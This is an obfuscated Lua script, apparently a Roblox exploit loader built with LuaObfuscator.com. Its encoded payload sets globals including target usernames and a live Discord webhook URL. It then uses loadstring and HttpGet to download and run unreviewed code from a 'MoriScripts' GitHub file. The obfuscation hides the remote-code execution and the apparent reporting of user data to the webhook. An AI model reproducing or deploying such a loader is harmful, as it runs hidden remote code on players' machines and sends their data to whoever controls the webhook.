--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.13) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v92=v5(v83,v19);v19=nil;return v92;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-1)) + 1)) ;return v85-(v85%(620 -(555 + 64))) ;end end else local v86=0;local v87;while true do if (v86==(931 -(857 + 74))) then v87=(570 -(330 + 37 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (1272 -((538 -312) + 1044)) ;v35=4 -3 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (65886 -(87 + 263))) + (v40 * (436 -(67 + 113))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -(19 -14)) ;v38=1 + 0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=953 -(802 + 150) ;local v46=(v20(v44,2 -1 ,63 -43 ) * ((3 -1)^(24 + 8))) + v43 ;local v47=v20(v44,1018 -(50 + 865 + 29 + 53) ,87 -(941 -(261 + 624)) );local v48=((v20(v44,56 -(42 -18) )==(1 + 0)) and  -1) or (431 -(44 + 386)) ;if (v47==(1486 -(998 + 488))) then if (v46==(0 -0)) then return v48 * (1187 -(1069 + 118)) ;else local v93=0;while true do if (v93==(772 -(201 + 571))) then v47=2 -1 ;v45=0 -0 ;break;end end end elseif (v47==((1436 -(1020 + 60)) + 1691)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(((1429 -(630 + 793)) -4)^(70 -(10 + 8))))) ;end local function v25(v49)local v50;if  not v49 then local v88=0 -(1747 -(760 + 987)) ;while true do if (v88==(0 -0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + (1913 -(1789 + 124))) );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==0) then v53=0;v54=nil;v52=1;end if (v52~=2) then else v57=nil;v58=nil;v52=482 -(83 + 396) ;end if (v52==(3 + 0)) then v59=nil;v60=nil;v52=5 -1 ;end if (v52==4) then while true do if (v53==1) then v56=nil;v57=nil;v53=1 + 1 ;end if (v53~=(560 -(306 + 254))) then else v54=0;v55=nil;v53=1 + 0 ;end if (v53==(5 -2)) then v60=nil;while true do local v98=1467 -(899 + 568) ;local v99;local v100;while true do if ((1 + 0)~=v98) then else while true do if (v99==0) then v100=0 -0 ;while true do if (v100==0) then local v179=0;local v180;while true do if (v179==0) then v180=0;while true do if (v180==(603 -(268 + 335))) then local v184=0;while true do if (v184==(290 -(60 + 230))) then if (v54==2) then local v185=572 -(426 + 146) ;local v186;while true do if (v185==0) then v186=0 + 0 ;while true do if (v186==(1457 -(282 + 1174))) then return v58;end if ((811 -(569 + 242))==v186) then local v194=0;local v195;while true do if (v194~=(0 -0)) then else v195=0 + 0 ;while true do if (0==v195) then local v203=1024 -(706 + 318) ;while true do if (v203~=1) then else v195=1;break;end if (v203==0) then for v205=1252 -(721 + 530) ,v23() do local v206=1271 -(945 + 326) ;local v207;local v208;local v209;while true do if (v206~=1) then else v209=nil;while true do if ((2 -1)==v207) then while true do if (v208==(0 + 0)) then v209=v21();if (v20(v209,1,701 -(271 + 429) )~=(0 + 0)) then else local v213=0;local v214;local v215;local v216;while true do if (v213~=(1503 -(1408 + 92))) then else if (v20(v215,1089 -(461 + 625) ,3)~=(1289 -(993 + 295))) then else v216[4]=v60[v216[4]];end v55[v205]=v216;break;end if (2==v213) then local v218=0 + 0 ;local v219;while true do if (v218==(1171 -(418 + 753))) then v219=0 + 0 ;while true do if ((1 + 0)~=v219) then else v213=3;break;end if (v219==0) then if (v20(v215,1,1)==1) then v216[1 + 1 ]=v60[v216[1 + 1 ]];end if (v20(v215,2,2)~=(530 -(406 + 123))) then else v216[1772 -(1749 + 20) ]=v60[v216[1 + 2 ]];end v219=1323 -(1249 + 73) ;end end break;end end end if (v213~=1) then else local v220=0;while true do if (v220~=(1 + 0)) then else v213=2;break;end if (v220==0) then v216={v22(),v22(),nil,nil};if (v214==(1900 -(106 + 1794))) then local v225=0;local v226;local v227;while true do if (0==v225) then v226=0 + 0 ;v227=nil;v225=1 + 0 ;end if (v225==(2 -1)) then while true do if (v226~=(0 -0)) then else v227=114 -(4 + 110) ;while true do if ((584 -(57 + 527))==v227) then v216[1430 -(41 + 1386) ]=v22();v216[4]=v22();break;end end break;end end break;end end elseif (v214==1) then v216[3]=v23();elseif (v214==(105 -(17 + 86))) then v216[3 + 0 ]=v23() -(2^16) ;elseif (v214~=3) then else local v234=0 -0 ;local v235;while true do if (v234==0) then v235=0 -0 ;while true do if (v235==(166 -(122 + 44))) then v216[3]=v23() -((2 -0)^16) ;v216[4]=v22();break;end end break;end end end v220=3 -2 ;end end end if (v213~=(0 + 0)) then else local v221=0 + 0 ;while true do if (v221==(0 -0)) then local v224=65 -(30 + 35) ;while true do if (v224==1) then v221=1;break;end if (v224~=(0 + 0)) then else v214=v20(v209,1259 -(1043 + 214) ,11 -8 );v215=v20(v209,4,6);v224=1;end end end if (1~=v221) then else v213=1;break;end end end end end break;end end break;end if (v207==0) then local v212=0;while true do if (1==v212) then v207=1213 -(323 + 889) ;break;end if (v212~=(0 -0)) then else v208=580 -(361 + 219) ;v209=nil;v212=321 -(53 + 267) ;end end end end break;end if (v206==(0 + 0)) then v207=413 -(15 + 398) ;v208=nil;v206=1;end end end for v210=1,v23() do v56[v210-(983 -(18 + 964)) ]=v28();end v203=1;end end end if (v195==(3 -2)) then v186=1 + 0 ;break;end end break;end end end end break;end end end if (v54~=(0 + 0)) then else local v187=850 -(20 + 830) ;while true do if (2==v187) then v54=1;break;end if (v187==(0 + 0)) then local v191=126 -(116 + 10) ;local v192;while true do if (v191==(0 + 0)) then v192=0;while true do if (v192~=0) then else local v202=738 -(542 + 196) ;while true do if (v202==(1 -0)) then v192=1;break;end if ((0 + 0)==v202) then v55={};v56={};v202=1 + 0 ;end end end if (v192==(1 + 0)) then v187=1;break;end end break;end end end if (v187==(2 -1)) then local v193=0;while true do if (v193==(2 -1)) then v187=2;break;end if (v193==0) then v57={};v58={v55,v56,nil,v57};v193=1;end end end end end v184=1122 -(118 + 1003) ;end if (1==v184) then v180=2 -1 ;break;end end end if ((378 -(142 + 235))==v180) then v100=1;break;end end break;end end end if (v100~=1) then else if (1==v54) then local v181=0;local v182;local v183;while true do if (v181~=(4 -3)) then else while true do if (v182~=0) then else v183=0 + 0 ;while true do if (v183==0) then local v188=0;while true do if (v188~=1) then else v183=978 -(553 + 424) ;break;end if (v188==(0 -0)) then v59=v23();v60={};v188=1;end end end if (v183~=(1 + 0)) then else local v189=0 + 0 ;local v190;while true do if (v189==0) then v190=0;while true do if (0~=v190) then else for v197=1,v59 do local v198=0;local v199;local v200;local v201;while true do if (v198==0) then v199=0 + 0 ;v200=nil;v198=1 + 0 ;end if (v198~=(1 + 0)) then else v201=nil;while true do if (v199~=1) then else if (v200==(2 -1)) then v201=v21()~=0 ;elseif (v200==(5 -3)) then v201=v24();elseif (v200~=(6 -3)) then else v201=v25();end v60[v197]=v201;break;end if (v199==0) then v200=v21();v201=nil;v199=1;end end break;end end end v58[3]=v21();v190=1;end if (v190==1) then v183=2;break;end end break;end end end if (v183==(1 + 1)) then v54=9 -7 ;break;end end break;end end break;end if (v181==(753 -(239 + 514))) then v182=0;v183=nil;v181=1;end end end break;end end break;end end break;end if (v98==(0 + 0)) then v99=0;v100=nil;v98=1330 -(797 + 532) ;end end end break;end if (v53==(2 + 0)) then v58=nil;v59=nil;v53=3;end end break;end if (v52==1) then v55=nil;v56=nil;v52=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82==1) then local v109=0;local v110;local v111;while true do if (v109==0) then v110=v81[2];v111=v79[v81[3]];v109=1;end if (v109==1) then v79[v110 + 1 ]=v111;v79[v110]=v111[v81[4]];break;end end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=3) then local v101=0;local v102;local v103;local v104;local v105;while true do if (0==v101) then v102=v81[2];v103,v104=v72(v79[v102](v13(v79,v102 + 1 ,v81[3])));v101=1;end if (2==v101) then for v141=v102,v74 do local v142=0;while true do if (v142==0) then v105=v105 + 1 ;v79[v141]=v103[v105];break;end end end break;end if (v101==1) then v74=(v104 + v102) -1 ;v105=0;v101=2;end end elseif (v82>4) then v79[v81[2]][v81[3]]=v81[4];else local v116=0;while true do if (v116==0) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v116=1;end if (v116==7) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v116=8;end if (v116==9) then v79[v81[2]][v81[3]]=v81[4];break;end if (v116==1) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v116=2;end if (v116==4) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v116=5;end if (v116==5) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v116=6;end if (v116==8) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v116=9;end if (v116==6) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v116=7;end if (v116==2) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v116=3;end if (v116==3) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v116=4;end end end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>7) then local v117;local v118,v119;local v120;local v121;v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v120=v79[v81[3]];v79[v121 + 1 ]=v120;v79[v121]=v120[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v118,v119=v72(v79[v121](v13(v79,v121 + 1 ,v81[3])));v74=(v119 + v121) -1 ;v117=0;for v138=v121,v74 do v117=v117 + 1 ;v79[v138]=v118[v117];end v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v79[v121]=v79[v121](v13(v79,v121 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end else v79[v81[2]]=v81[3];end elseif (v82<=9) then v79[v81[2]]=v63[v81[3]];elseif (v82>10) then local v135=v81[2];v79[v135]=v79[v135](v13(v79,v135 + 1 ,v74));else v79[v81[2]]();end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503063O00766B6578637403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O333734332O36353332383639373531342F77684D743336696257636F754C694F68545842504558755363704C6E464F482O307A304C707435575F7142773439347A72514E3273347079524C32716F68677858786B4B03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012093O00063O0030083O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
